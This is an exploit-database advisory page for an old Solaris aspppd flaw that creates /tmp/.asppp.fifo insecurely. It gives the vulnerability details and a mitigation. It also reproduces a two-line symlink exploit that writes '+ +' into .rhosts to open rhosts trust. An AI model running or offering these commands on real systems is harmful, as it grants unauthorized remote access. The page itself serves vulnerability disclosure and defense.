header-logo
Suggest Exploit
vendor:
aspppd
by:
SecurityFocus
2,1
CVSS
LOW
Insecure File Creation
264
CWE
Product Name: aspppd
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Solaris
2001

Aspppd Insecure File Creation Vulnerability

Aspppd is a tool shipped with Solaris for dial up PPP access. This tool creates files in the /tmp directory insecurely (in particular /tmp/.asppp.fifo) allowing other users to link to these files an possibly elevate their privelages. This program is not by default shipped with SUID root privelages so an attacker will therefore only be able to write to files (via a symlink attack) as the user exectuing aspppd.

Mitigation:

Ensure that the aspppd program is not installed with SUID root privelages.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/292/info

Aspppd is a tool shipped with Solaris for dial up PPP access. This tool creates files in the /tmp directory insecurely (in particular /tmp/.asppp.fifo) allowing other users to link to these files an possibly elevate their privelages. This program is not by default shipped with SUID root privelages so an attacker will therefore only be able to write to files (via a symlink attack) as the user exectuing aspppd. 

$ echo "+ +" >> .rhosts
$ ln -s /.rhosts /tmp/.asppp.fifo

Wait for asppd to be excecuted.

Navigation

Suggest Exploit

Services By CQR